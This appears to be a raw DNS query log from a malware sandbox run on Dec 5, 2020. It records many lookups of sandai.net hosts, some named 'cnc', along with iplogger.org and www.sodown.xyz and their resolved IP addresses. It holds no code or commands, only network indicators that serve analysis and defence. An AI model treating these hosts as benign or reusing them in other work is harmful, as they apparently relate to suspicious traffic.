                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net39.98.57.143A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net47.92.75.245A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET8.8.8.8192.168.2.30x600aNo error (0)bgphub5u.sandai.net39.100.9.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.894771099 CET8.8.8.8192.168.2.30x7c2No error (0)dream.pics8.208.85.95A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.hz.sandai.netpmap.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.sandai.net47.97.7.140A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.921921015 CET8.8.8.8192.168.2.30xf80fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.959666014 CET8.8.8.8192.168.2.30x6951Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:47.500004053 CET8.8.8.8192.168.2.30xe8e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.046248913 CET8.8.8.8192.168.2.30x1a3aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub5sr.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET8.8.8.8192.168.2.30x7c5No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.467833042 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.504851103 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.506387949 CET8.8.8.8192.168.2.30xfb24Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)hub5pr.sandai.netbgphub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.39.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.169.85A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.195.246A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.194.216A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.171.207A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET8.8.8.8192.168.2.30x7c6No error (0)bgphub5pr.sandai.net47.92.125.145A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.541173935 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.542056084 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.576889992 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.578296900 CET8.8.8.8192.168.2.30x5596Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.593235016 CET8.8.8.8192.168.2.30x7b6aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.614557981 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.616168976 CET8.8.8.8192.168.2.30x88b9Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654295921 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654336929 CET8.8.8.8192.168.2.30xe1d0Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.681833982 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.691803932 CET8.8.8.8192.168.2.30x6fbName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.727684975 CET8.8.8.8192.168.2.30x7c7Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.729172945 CET8.8.8.8192.168.2.30x621fName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.141067982 CET8.8.8.8192.168.2.30xfec2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.545767069 CET8.8.8.8192.168.2.30xeaf4Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.582858086 CET8.8.8.8192.168.2.30x20dbName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.678586006 CET8.8.8.8192.168.2.30xb67Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.899038076 CET8.8.8.8192.168.2.30xeaf4Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.931978941 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.967845917 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.969422102 CET8.8.8.8192.168.2.30xe49bName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.998538971 CET8.8.8.8192.168.2.30x7c8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.009165049 CET8.8.8.8192.168.2.30x709aName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.218580008 CET8.8.8.8192.168.2.30xd672Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.766110897 CET8.8.8.8192.168.2.30x7fcdName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.312589884 CET8.8.8.8192.168.2.30x2599Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.858886957 CET8.8.8.8192.168.2.30x1fafName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET8.8.8.8192.168.2.30x7d31Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET8.8.8.8192.168.2.30x3923Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET8.8.8.8192.168.2.30x7a6dNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET8.8.8.8192.168.2.30xd060No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.99.221A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.100.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.37A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.20A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.21A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.38A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.100.9.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net47.92.75.245A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.98.57.143A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.hz.sandai.nethub5c.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.hz.sandai.netpmap.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.sandai.net47.97.7.140A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.63.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz172.67.208.194A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.62.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET8.8.8.8192.168.2.30x8e07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET8.8.8.8192.168.2.30x1789Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET8.8.8.8192.168.2.30x3d74Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET8.8.8.8192.168.2.30xdf01Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET8.8.8.8192.168.2.30x302eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET8.8.8.8192.168.2.30xbe4bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET8.8.8.8192.168.2.30x841dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.585874081 CET8.8.8.8192.168.2.30xf3dbName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.sandai.netbgphub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.39.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.169.85A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.195.246A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.194.216A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.171.207A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.125.145A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.804965973 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.807198048 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.840622902 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.843271971 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.845679045 CET8.8.8.8192.168.2.30xaafdName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.882863045 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.884290934 CET8.8.8.8192.168.2.30x297bName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922142029 CET8.8.8.8192.168.2.30xbbbaName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922636032 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.958138943 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.959275007 CET8.8.8.8192.168.2.30x9cd7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.995296001 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.998722076 CET8.8.8.8192.168.2.30x95a8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.102962017 CET8.8.8.8192.168.2.30x112dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.258291006 CET8.8.8.8192.168.2.30x7007Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.287118912 CET8.8.8.8192.168.2.30x4483Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.294251919 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.323529005 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.332926989 CET8.8.8.8192.168.2.30x527Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.360413074 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.370055914 CET8.8.8.8192.168.2.30xac55Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.408910990 CET8.8.8.8192.168.2.30x3d9bName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.409029961 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.633642912 CET8.8.8.8192.168.2.30xcc35Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.172971010 CET8.8.8.8192.168.2.30x833dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.722223043 CET8.8.8.8192.168.2.30x75f8Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.258011103 CET8.8.8.8192.168.2.30xdb3cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.799576044 CET8.8.8.8192.168.2.30xd7ecName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.341470003 CET8.8.8.8192.168.2.30x4d11Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.875819921 CET8.8.8.8192.168.2.30xfc5cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.408987999 CET8.8.8.8192.168.2.30x9a51Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.931457043 CET8.8.8.8192.168.2.30x5ca0Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.490495920 CET8.8.8.8192.168.2.30x7e7fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
